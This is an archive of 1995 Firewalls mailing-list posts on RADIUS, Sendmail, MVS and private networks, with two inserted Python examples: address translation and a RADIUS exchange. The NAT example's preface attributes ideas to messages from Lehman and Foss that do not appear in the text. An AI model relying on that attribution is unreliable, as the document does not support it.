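Two messages above ask for the same mechanism from different angles: Lehman wants a box that rewrites his device's 128.0.0.x addresses into legal ones so the "normal" network can reach it, and Foss, replying to Murrell, describes leasing provider addresses from a shared global pool so that renumbering only touches the pool. The translator below is an added example, not code from either poster or from any product; the 191.1.2.x mapping, the pool addresses and the never-expiring leases are assumptions. It shows the part people usually forget: after changing an address you must recompute both the IP header checksum and the TCP/UDP checksum, because the transport checksum covers the addresses through the pseudo-header.

```python
"""Static and pooled address translation with checksum repair (added example)."""
import ipaddress
import struct


def checksum(data):
    """RFC 1071 Internet checksum: one's-complement sum of 16-bit words."""
    data = bytes(data)
    if len(data) % 2:
        data = data + b"\0"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def _fix_checksums(hdr, body):
    """Recompute the IP header checksum and, for TCP/UDP, the transport checksum
    (which covers the addresses via the pseudo-header) after an address change."""
    proto = hdr[9]
    hdr[10:12] = b"\0\0"
    hdr[10:12] = struct.pack("!H", checksum(hdr))
    if proto in (6, 17):
        off = 16 if proto == 6 else 6          # checksum offset in TCP / UDP header
        body[off:off + 2] = b"\0\0"
        pseudo = bytes(hdr[12:20]) + struct.pack("!BBH", 0, proto, len(body))
        c = checksum(pseudo + bytes(body))
        if proto == 17 and c == 0:
            c = 0xFFFF                         # UDP: zero means "no checksum"
        body[off:off + 2] = struct.pack("!H", c)
    return bytes(hdr + body)


def build_packet(src, dst, proto, payload):
    """Constructed sample input: an IPv4 packet (no options) with valid checksums."""
    hdr = bytearray(struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
                                ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed))
    return _fix_checksums(hdr, bytearray(payload))


def tcp_segment(sport, dport):
    """Constructed sample TCP SYN header; the checksum is filled by build_packet."""
    return struct.pack("!HHIIBBHHH", sport, dport, 1, 0, 0x50, 0x02, 8192, 0, 0)


def udp_datagram(sport, dport, data=b""):
    return struct.pack("!HHHH", sport, dport, 8 + len(data), 0) + data


def addresses(pkt):
    return str(ipaddress.IPv4Address(pkt[12:16])), str(ipaddress.IPv4Address(pkt[16:20]))


def checksums_ok(pkt):
    """True if the IP header checksum and (for TCP/UDP) the transport checksum verify."""
    ihl = (pkt[0] & 0xF) * 4
    if checksum(pkt[:ihl]) != 0:
        return False
    proto = pkt[9]
    if proto in (6, 17):
        pseudo = pkt[12:20] + struct.pack("!BBH", 0, proto, len(pkt) - ihl)
        return checksum(pseudo + pkt[ihl:]) == 0
    return True


class Translator:
    """Fixed 1:1 entries (Lehman's device) plus a shared pool of global addresses
    leased on first use (Foss's scheme). Assumed design; leases never expire here."""

    def __init__(self, static=None, pool=()):
        self.static = dict(static or {})       # inside -> outside
        self.pool = list(pool)                 # unused global addresses
        self.leased = {}                       # inside -> outside, from the pool

    def outside_for(self, inside):
        if inside in self.static:
            return self.static[inside]
        if inside not in self.leased:
            if not self.pool:
                raise RuntimeError("global address pool exhausted")
            self.leased[inside] = self.pool.pop(0)
        return self.leased[inside]

    def inside_for(self, outside):
        for table in (self.static, self.leased):
            for inside, out in table.items():
                if out == outside:
                    return inside
        return None

    def outbound(self, pkt):
        """Inside -> outside: rewrite the source address."""
        ihl = (pkt[0] & 0xF) * 4
        hdr, body = bytearray(pkt[:ihl]), bytearray(pkt[ihl:])
        hdr[12:16] = ipaddress.IPv4Address(self.outside_for(addresses(pkt)[0])).packed
        return _fix_checksums(hdr, body)

    def inbound(self, pkt):
        """Outside -> inside: rewrite the destination, or drop if nothing maps to it."""
        inside = self.inside_for(addresses(pkt)[1])
        if inside is None:
            return None
        ihl = (pkt[0] & 0xF) * 4
        hdr, body = bytearray(pkt[:ihl]), bytearray(pkt[ihl:])
        hdr[16:20] = ipaddress.IPv4Address(inside).packed
        return _fix_checksums(hdr, body)
```

This is one-to-one translation only: a pool shared by more hosts than it has addresses needs port translation on top, and ICMP errors that quote an inner header would need that inner header rewritten too, neither of which the example does. Inbound packets with no mapping are dropped rather than forwarded, which is what makes the translator double as a crude filter.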
From firewalls-owner Tue Sep 12 18:00:06 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA29234 for firewalls-outgoing; Tue, 12 Sep 1995 17:32:50 -0700 Received: from translation.com (pao.translation.com [204.30.204.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA29226 for ; Tue, 12 Sep 1995 17:32:46 -0700 Received: (from audit@localhost) by translation.com (8.6.12/8.6.12) id RAA05121 for ; Tue, 12 Sep 1995 17:31:28 -0700 Date: Tue, 12 Sep 1995 17:31:28 -0700 Message-Id: <199509130031.RAA05121@translation.com> Received: from harley.translation.com(204.30.204.114) by pao via smap (V1.3mjr) id sma005116; Tue Sep 12 17:30:59 1995 X-Sender: afoss@pao X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: Andrew Foss Subject: User Authentication Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Are there any applications out there public domain or otherwise that do some sort of basic user/password authentication for network users? I've heard the name Radius used, but I thought they made displays? andrew Andrew Foss Tel. 415/494-NETS(6387) Network Translation Inc. Dir. 415/855-0725 1901 Embarcadero Rd. FAX 415/424-9110 Palo Alto, CA 94303 email afoss@translation.com web www.translation.com From firewalls-owner Tue Sep 12 19:00:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA01249 for firewalls-outgoing; Tue, 12 Sep 1995 18:35:59 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id SAA01239 for ; Tue, 12 Sep 1995 18:35:56 -0700 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA00922; Tue, 12 Sep 95 21:19:45 -0400 Date: Tue, 12 Sep 95 21:19:45 -0400 Message-Id: <9509130119.AA00922@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. 
Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: MVS vs the world Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Is it fair to mention that EBCDIC has no full colon ? back slash ? brackets ? curly brackets ? Number sign ? Exclamation point ? Requires all eight bits just to pass the alphabet ? No ? Sorry 8*) (use TCPIP) Warmly, Padgett ps one of the most popular programs I ever wrote was a CLIST to sort with the numbers first... pps have forgotten JCL three times now - maybe this time it will stick 8*). From firewalls-owner Tue Sep 12 19:02:41 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA01204 for firewalls-outgoing; Tue, 12 Sep 1995 18:35:13 -0700 Received: from aztec.connectsoft.com (aztec.connectsoft.com [199.237.157.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA01197 for ; Tue, 12 Sep 1995 18:35:10 -0700 Received: (from ophir@localhost) by aztec.connectsoft.com (8.6.9/8.6.9) id SAA29575; Tue, 12 Sep 1995 18:56:51 -0700 Date: Tue, 12 Sep 1995 18:56:50 -0700 (PDT) From: Ophir Ronen To: Andrew Foss cc: firewalls@GreatCircle.COM Subject: Re: User Authentication In-Reply-To: <199509130031.RAA05121@translation.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Information on radius can be obtained @ http://home.merit.edu/webstuff/weiwang/Radius/Radius.html -Ophir *_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_ Ophir Ronen Email: ophir@connectsoft.com ConnectSoft Inc. Phone: (206) 803-5785 Pager: (206) 608-7430 *_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_ On Tue, 12 Sep 1995, Andrew Foss wrote: > Are there any applications out there public domain or otherwise that do some > sort of basic user/password authentication for network users? > I've heard the name Radius used, but I thought they made displays? > > andrew > Andrew Foss Tel. 
415/494-NETS(6387) > Network Translation Inc. Dir. 415/855-0725 > 1901 Embarcadero Rd. FAX 415/424-9110 > Palo Alto, CA 94303 email afoss@translation.com > web www.translation.com > From firewalls-owner Tue Sep 12 19:30:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA02095 for firewalls-outgoing; Tue, 12 Sep 1995 19:05:26 -0700 Received: from blob.best.net (blob.best.net [204.156.128.88]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA02088 for ; Tue, 12 Sep 1995 19:05:23 -0700 Received: from shell1.best.com (shell1.best.com [204.156.128.10]) by blob.best.net (8.6.12/8.6.5) with ESMTP id TAA15331; Tue, 12 Sep 1995 19:04:05 -0700 Received: from dns.best.com (yobie.vip.best.com [204.156.155.53]) by shell1.best.com (8.6.12/8.6.5) with SMTP id TAA19107; Tue, 12 Sep 1995 19:04:01 -0700 Date: Tue, 12 Sep 1995 19:04:01 -0700 Message-Id: <199509130204.TAA19107@shell1.best.com> From: "MetaGenesis Inc." To: scott@Disclosure.COM, gregg@smtpgate.Disclosure.COM Subject: Re: Re: Interpreting CERT advisories Cc: Firewalls@GreatCircle.COM X-Mailer: ProntoIP [version 1.0] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk FYI IBM now sells Open MVS for the Mainframe which supports a native TCP/IP stack eliminating the need for SNA. It runs on the old 30xx and the new ES 9xxx series of mainframes. 
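Foss asks for something that does basic user/password authentication for network users and Ronen points him at RADIUS. The exchange below is an added example of the RADIUS Access-Request/Access-Accept round trip, written for this page in the packet format later standardized in RFC 2865; it is not from the thread and not Merit's or Livingston's code. The user database, the shared secret and the NAS address are assumptions. It shows the two things a practitioner needs to see: how the User-Password attribute is hidden (MD5 keystream blocks derived from the shared secret and the Request Authenticator, chained block to block), and how the NAS checks the Response Authenticator so that a reply from a party that does not know the secret is rejected.

```python
"""RADIUS Access-Request / Access-Accept exchange, both sides (added example)."""
import hashlib
import hmac
import os
import struct

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
USER_NAME, USER_PASSWORD, NAS_IP_ADDRESS = 1, 2, 4


def _attr(kind, value):
    return struct.pack("!BB", kind, len(value) + 2) + value


def _packet(code, ident, authenticator, attrs):
    return struct.pack("!BBH", code, ident, 20 + len(attrs)) + authenticator + attrs


def hide_password(password, secret, req_auth):
    """RFC 2865 section 5.2: pad to a multiple of 16 bytes, then XOR each block
    with MD5(secret + previous ciphertext block), seeded by the Request Authenticator."""
    p = password.encode()
    p += b"\0" * (-len(p) % 16)
    out, prev = b"", req_auth
    for i in range(0, len(p), 16):
        block = bytes(x ^ y for x, y in zip(p[i:i + 16], hashlib.md5(secret + prev).digest()))
        out, prev = out + block, block
    return out


def reveal_password(hidden, secret, req_auth):
    """Inverse of hide_password; returns bytes with the null padding stripped."""
    out, prev = b"", req_auth
    for i in range(0, len(hidden), 16):
        out += bytes(x ^ y for x, y in zip(hidden[i:i + 16], hashlib.md5(secret + prev).digest()))
        prev = hidden[i:i + 16]
    return out.rstrip(b"\0")


def parse_attrs(body):
    attrs, i = {}, 0
    while i < len(body):
        kind, length = body[i], body[i + 1]
        if length < 2 or i + length > len(body):
            raise ValueError("malformed attribute")
        attrs[kind] = body[i + 2:i + length]
        i += length
    return attrs


def response_authenticator(code, ident, length, req_auth, attrs, secret):
    """MD5(Code + ID + Length + RequestAuth + Attributes + Secret), RFC 2865 section 3."""
    return hashlib.md5(struct.pack("!BBH", code, ident, length) + req_auth + attrs + secret).digest()


def build_access_request(user, password, secret, ident, nas_ip, req_auth=None):
    """NAS side: returns (packet, request_authenticator)."""
    req_auth = req_auth or os.urandom(16)      # must be unpredictable per request
    attrs = (_attr(USER_NAME, user.encode())
             + _attr(USER_PASSWORD, hide_password(password, secret, req_auth))
             + _attr(NAS_IP_ADDRESS, bytes(int(o) for o in nas_ip.split("."))))
    return _packet(ACCESS_REQUEST, ident, req_auth, attrs), req_auth


def server_handle(packet, secret, users):
    """Server side: check the credentials, answer Access-Accept or Access-Reject."""
    code, ident, length = struct.unpack("!BBH", packet[:4])
    if code != ACCESS_REQUEST or length != len(packet) or length < 20:
        return None
    req_auth, attrs = packet[4:20], parse_attrs(packet[20:])
    user = attrs.get(USER_NAME, b"").decode(errors="replace")
    hidden = attrs.get(USER_PASSWORD, b"")
    ok = (len(hidden) > 0 and len(hidden) % 16 == 0 and user in users
          and hmac.compare_digest(users[user].encode(), reveal_password(hidden, secret, req_auth)))
    code = ACCESS_ACCEPT if ok else ACCESS_REJECT
    return _packet(code, ident, response_authenticator(code, ident, 20, req_auth, b"", secret), b"")


def client_check(reply, req_auth, secret):
    """NAS side: return the reply code only if the Response Authenticator verifies."""
    code, ident, length = struct.unpack("!BBH", reply[:4])
    expected = response_authenticator(code, ident, length, req_auth, reply[20:], secret)
    return code if hmac.compare_digest(reply[4:20], expected) else None
```

Note what the protocol does and does not give you: the password never crosses the wire in clear, and the NAS can tell a genuine reply from a forged one, but the hiding is only as strong as the shared secret and the randomness of the Request Authenticator, and the request itself carries no integrity check in this base format.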
From firewalls-owner Tue Sep 12 19:32:41 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA02813 for firewalls-outgoing; Tue, 12 Sep 1995 19:30:44 -0700 Received: from merit.edu (merit.edu [35.1.1.42]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA02800 for ; Tue, 12 Sep 1995 19:30:39 -0700 Received: from ohm.merit.edu (ohm.merit.edu [198.108.60.65]) by merit.edu (8.6.12/merit-2.0) with ESMTP id WAA28820 for ; Tue, 12 Sep 1995 22:29:21 -0400 From: William Bulley Received: (web@localhost) by ohm.merit.edu (8.6.9/8.6.5) id WAA24317 for firewalls@GreatCircle.COM; Tue, 12 Sep 1995 22:38:06 -0400 Message-Id: <199509130238.WAA24317@ohm.merit.edu> Subject: Re: user authentication To: firewalls@GreatCircle.COM Date: Tue, 12 Sep 1995 22:38:06 -0400 (EDT) X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 741 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The official Merit WWW info on RADIUS is at the following URL: http://www.merit.edu/michnet/ (click on RADIUS) The latest version of Merit RADIUS can be found at this URL: ftp://ftp.merit.edu/radiu/releases/radius.2.3.tar.gz This version has a very few minor rough edges for Ultrix 4.2 and BSDi 2.0 which are being removed and a new version due out soon. Most installations will not be affected (unless they are on those platforms or need the rlmadmin(8) tool). Regards, web... -- William Bulley, N8NXN Senior Systems Research Programmer Merit Network Inc. 
Domain: web@merit.edu 4251 Plymouth Road MaBell: (313) 764-9993 Ann Arbor, Michigan 48105-2785 Fax: (313) 747-3185 From firewalls-owner Tue Sep 12 20:00:14 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA03816 for firewalls-outgoing; Tue, 12 Sep 1995 19:56:58 -0700 Received: from zork.tiac.net (zork.tiac.net [199.0.65.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA03809 for ; Tue, 12 Sep 1995 19:56:54 -0700 Received: from moose (jerboa.com [199.3.130.95]) by zork.tiac.net (8.6.9/8.6.6.Beta9) with SMTP id WAA19687; Tue, 12 Sep 1995 22:55:25 -0400 Message-Id: <199509130255.WAA19687@zork.tiac.net> X-Sender: ian@tiac.net. X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 12 Sep 1995 22:54:27 -0400 To: gregg@smtpgate.Disclosure.COM, Firewalls@Greatcircle.COM From: Ian Poynter Subject: Re: Re: Interpreting CERT advisories Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 01:56 PM 9/12/95 est, gregg@smtpgate.Disclosure.COM wrote: >Excuse me?!? MVS has been *in production* since the late 70's; abundantly >installed around the World. IMHO, plenty of time/opportunity for hackers to >[Stuff deleted] Well, I'm not sure about MVS and its (Internet) security record, but there was a lovely article about hacking OS/400 in 2600 recently. Has anyone run across a similarly useful catalog of MVS's problems? I think that since many of the (in)security problems on the Internet are unix-related, people can all too easily build a false sense of security around the "not-unix". I'm just waiting for the first Windows NT problem to show up on the CERT list; given the number of NT-based web servers out there, I suspect it's only a matter of time. Just to set the record straight, although I've worked with Unix for longer, I'm also an NT fan. In fact, I'm typing this on an NT system, so no flames please :-)... Just my $0.02 for a change :-). 
Ian ----- Ian Poynter ian@jerboa.com Jerboa Internet Services (617) 357-5013 PO Box 120054, Boston, MA 02112 Providing Internet advice, consulting and training for businesses. From firewalls-owner Tue Sep 12 20:30:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA04160 for firewalls-outgoing; Tue, 12 Sep 1995 20:08:03 -0700 Received: from lobster.wellfleet.com (lobster.wellfleet.com [192.32.253.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id UAA04152 for ; Tue, 12 Sep 1995 20:08:00 -0700 Received: from paperboy.corpeast.baynetworks.com (paperboy.wellfleet.com) by lobster.wellfleet.com (4.1/SMI-4.1) id AA13376; Tue, 12 Sep 95 23:05:31 EDT Received: from BayNetworks.com by paperboy.corpeast.baynetworks.com (4.1/SMI-4.1) id AA17265; Tue, 12 Sep 95 23:06:38 EDT From: Post_Office@BayNetworks.com (Post Office) Reply-To: Post_Office@BayNetworks.com To: Firewalls@GreatCircle.COM Subject: NDN: Firewalls-Digest V4 #522 Date: 12 Sep 1995 22:32:05 GMT Message-Id: <471719869.1556640@BayNetworks.com> Organization: Bay Networks Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sorry. Your message could not be delivered to: Peter Harrison,Wellfleet Field (Mailbox or Conference is full.) 
From firewalls-owner Tue Sep 12 20:32:41 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA04023 for firewalls-outgoing; Tue, 12 Sep 1995 20:02:18 -0700 Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id UAA04016 for ; Tue, 12 Sep 1995 20:02:14 -0700 Received: from pm1-27.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA10958; Tue, 12 Sep 95 21:59:02 -0400 Date: Tue, 12 Sep 95 21:59:02 -0400 Message-Id: <9509130159.AA10958@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Ophir Ronen From: frankw@in.net (Frank Willoughby) Subject: Re: User Authentication Cc: firewalls@GreatCircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I would not recommend relying on strong authentication only. Any hacker worth their salt will let the user log in using strong authentication and then take over the session after the user has logged in to their system. It is better to rely on user -> firewall and/or firewall -> firewall encryption (using strong authentication, of course) than to rely on strong authentication only. Best Regards, Frank From firewalls-owner Tue Sep 12 20:48:56 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA04375 for firewalls-outgoing; Tue, 12 Sep 1995 20:17:31 -0700 Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id UAA04368 for ; Tue, 12 Sep 1995 20:17:27 -0700 Received: from pm1-27.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA11694; Tue, 12 Sep 95 22:12:03 -0400 Date: Tue, 12 Sep 95 22:12:03 -0400 Message-Id: <9509130212.AA11694@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. 
Information Security) From: frankw@in.net (Frank Willoughby) Subject: Re: MVS vs the world Cc: firewalls@GreatCircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I agree with Padgett. MVS might have been good in its time, but it is time to bury the dinosaur Operating Systems & technologies (my first programs were written on paper tape). Aside from being user unfriendly & a throwback to days of old, MVS is also expensive to deploy. How many security administrators does it take to keep 500 users happy? 5, 10, 20? Most decent Unix system administrators can handle the load themselves. Isn't MVS also from the makers of those systems which require UPS and need a team of engineers to resurrect the systems when the UPS fails? 8^) Sorry for the digression, but I couldn't resist commenting on this topic. Enough tongue-in-cheek for now. We now return you to your firewalls mails. 8^) Best Regards, Frank From firewalls-owner Tue Sep 12 21:30:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA06291 for firewalls-outgoing; Tue, 12 Sep 1995 21:22:01 -0700 Received: from clark.net (clark.net [168.143.0.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id VAA06274 for ; Tue, 12 Sep 1995 21:21:56 -0700 Received: from clark.net (aacccard@clark.net [168.143.0.7]) by clark.net (8.6.12/8.6.5) with SMTP id AAA13658 for ; Wed, 13 Sep 1995 00:20:35 -0400 Date: Wed, 13 Sep 1995 00:20:35 -0400 Message-Id: <199509130420.AAA13658@clark.net> X-Sender: aacccard@clark.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: aacccard@clark.net (john card) Subject: Problem. Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Please help, if anyone can. I need to find out if a system, 60-8238@wwivnet.org, is on this list. I have no idea how to use a list and need help finding this address in the mailing list. 
I run a BBS and somehow one of my users subscribed to the list and now I can't get off it because I don't know what it is. Please help me From firewalls-owner Tue Sep 12 22:30:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA07721 for firewalls-outgoing; Tue, 12 Sep 1995 22:05:21 -0700 Received: from psisa.com ([198.3.200.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id WAA07714 for ; Tue, 12 Sep 1995 22:05:15 -0700 Received: (from chk@localhost) by psisa.com (8.6.12/guess) id AAA24232; Wed, 13 Sep 1995 00:02:32 -0500 Message-Id: <199509130502.AAA24232@psisa.com> Subject: Re: Secure version of Sendmail To: bret@real.com (Bret McDanel) Date: Wed, 13 Sep 1995 00:02:31 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <199509121931.TAA06249@real.com> from "Bret McDanel" at Sep 12, 95 07:31:56 pm From: chk@psa.pencom.com (Christian Kuhtz) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 1646 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Right! However stay away from anything less than 8.6.12. The other > > versions have security holes. > > and 8.6.12 doesn't use syslog? Unless you tell it to, no. As soon as you start running mail gateways, you have the potential of running into a denial of service problem anyways. Maybe not on the hub (firewall) itself, but usually somewhere down the road. And Sendmail is the only useful mail package out there. I'd be happy to adopt anything which offers me Sendmail functionality in a more secure fashion. So, let's get things into perspective here. > There is no secure version.. there are only more secure versions.. Please, let's not start the flame wars a la 'secure systems' or 'unbreakable encryption'. You can make Sendmail V8 operate in a pretty secure fashion, with e.g. smap around it if you don't trust it alone. Has there been real exploitation of Sendmail V8 bugs before a fix was available? 
I'm not aware of any documented cases.

> This is not totally the fault of any sendmail, as the case with syslog..

Give me a break, can we please stay away from system dependent holes when discussing individual packages? And let's bring some common sense into all these discussions. And if you don't trust syslog() calls, you're welcome to replace them with either a wrapper or an alternative facility, it's really not that difficult.

Best Regards,
Chris

--
 ___  ____ __
| _ \/ __/| \     Christian Kuhtz                          +1 914-684-4467
| _/\__ \| \ \    Pencom System Administration Services    fax: +1 914-684-3791
|_| /___/|_|__\   on-location at Advantis/IBM Global Network, White Plains, NY

From firewalls-owner Tue Sep 12 23:00:13 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA08202 for firewalls-outgoing; Tue, 12 Sep 1995 22:36:35 -0700
Received: from psisa.com ([198.3.200.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id WAA08195 for ; Tue, 12 Sep 1995 22:36:31 -0700
Received: (from chk@localhost) by psisa.com (8.6.12/guess) id AAA24912; Wed, 13 Sep 1995 00:33:57 -0500
Message-Id: <199509130533.AAA24912@psisa.com>
Subject: Re: Secure version of Sendmail
To: ac@hawk.twinds.com (Arley Carter)
Date: Wed, 13 Sep 1995 00:33:57 -0500 (CDT)
Cc: chk@psa.pencom.com, firewalls@GreatCircle.COM
In-Reply-To: from "Arley Carter" at Sep 12, 95 04:35:56 pm
From: chk@psa.pencom.com (Christian Kuhtz)
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Content-Length: 1337
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> In that light, I query sendmail secure? How?....... In what context do you
> mean secure?

Secure in the sense that I have had several penetration tests run over Sendmail V8 boxes and so far no one has ever found any vulnerabilities in firewalls designed/managed by me. Yes, most of the time I do run smap. Sendmail V8 should maybe do something like a chroot() to a place where it can't do any damage.
Maybe I'll get some time to check out how one could accomplish that very soon, but there are some other things in the queue before that.

I like Sendmail V8 because the fix policy is very refreshing. As long as you stay up to date with your latest release, you shouldn't have any problems. And then, there's always the possibility of building dual firewalls with a DMZ in between -- which in turn opens up ways to prevent intrusion effectively even if the exterior firewall is compromised.

> That being said I am delivering this mail with sendmail, latest version
> of sendmail "certified" by hp for hpux. ;-)

:) Wow, geewiz, can I buy anything with that? :)

Best Regards,
Chris

--
 ___  ____ __
| _ \/ __/| \     Christian Kuhtz                          +1 914-684-4467
| _/\__ \| \ \    Pencom System Administration Services    fax: +1 914-684-3791
|_| /___/|_|__\   on-location at Advantis/IBM Global Network, White Plains, NY

From firewalls-owner Wed Sep 13 04:00:12 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA13713 for firewalls-outgoing; Wed, 13 Sep 1995 03:38:28 -0700
Received: from gate.ggr.co.uk (gate.ggr.co.uk [193.128.25.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id DAA13698 for ; Wed, 13 Sep 1995 03:38:12 -0700
Received: from mailhub.ggr.co.uk (uk0x07.ggr.co.uk) by gate.ggr.co.uk; Wed, 13 Sep 1995 11:34:40 +0100
Received: from ukwsv3.ggr.co.uk (imd1707@ukwsv3.ggr.co.uk) by mailhub.ggr.co.uk; Wed, 13 Sep 1995 11:32:57 +0100
Date: Wed, 13 Sep 1995 11:36:25 +0100 (BST)
From: Ian Dunkin
X-Sender: imd1707@ukwsv3
To: Ian Poynter
cc: gregg@smtpgate.Disclosure.COM, Firewalls@Greatcircle.COM
Subject: Re: Re: Interpreting CERT advisories
In-Reply-To: <199509130255.WAA19687@zork.tiac.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

- On Tue, 12 Sep 1995, Ian Poynter wrote:

> At 01:56 PM 9/12/95 est, gregg@smtpgate.Disclosure.COM wrote:
> I think that since many of the
> (in)security problems on the Internet are
> unix-related, people can all too easily build a false sense of security
> around the "not-unix". I'm just waiting for the first Windows NT problem to
> show up on the CERT list; given the number of NT-based web servers out
> there, I suspect it's only a matter of time.

Ken Hardy posted details on this list of a security hole in the EMWAC NT web server a month or so ago. I understand there's now a fix for this particular one, but it illustrates your point.

I.
--
Ian Dunkin
--

From firewalls-owner Wed Sep 13 05:32:42 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA15538 for firewalls-outgoing; Wed, 13 Sep 1995 05:23:37 -0700
Received: from netcomsv.netcom.com (uucp13.netcom.com [163.179.3.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA15531 for ; Wed, 13 Sep 1995 05:23:34 -0700
Received: by netcomsv.netcom.com with UUCP (8.6.12/SMI-4.1) id FAA15212; Wed, 13 Sep 1995 05:14:06 -0700
Received: from ws02.hteinc.com by rs02.hteinc.com (8.6.12/1.7) id HAA17333; Wed, 13 Sep 1995 07:49:39 -0400
Date: Wed, 13 Sep 95 07:36:21 PDT
From: Kurt Kessel
Subject: Creating a Private Network
To: Firewalls@GreatCircle.COM
X-Mailer: Chameleon ENGP1, TCP/IP for Windows, NetManage Inc.
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I am working on designing a private network connected by a firewall machine to the Internet. I have read RFC 1597 & the Cheswick and Bellovin book, but need a jump start. What I need to know is: are there any documents that give more of a "how to" type discussion of the implementation of a private network connected to the Internet? Any suggestions would be appreciated! TIA.

Kurt Kessel
HTE, Inc.
kurt@hteinc.com
407-841-3235 (v)
407-246-8835 (fax)

From firewalls-owner Wed Sep 13 06:00:06 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA16008 for firewalls-outgoing; Wed, 13 Sep 1995 05:46:33 -0700
Received: from gateway.damark.com (GATEWAY.DAMARK.COM [204.17.145.230]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA16001 for ; Wed, 13 Sep 1995 05:46:29 -0700
Received: by gateway.damark.com; id HAA11152; Wed, 13 Sep 1995 07:45:12 -0500
Received: from unknown(172.31.254.231) by gateway.damark.com via smap (g3.0.1) id sme011142; Wed, 13 Sep 95 07:44:54 -0500
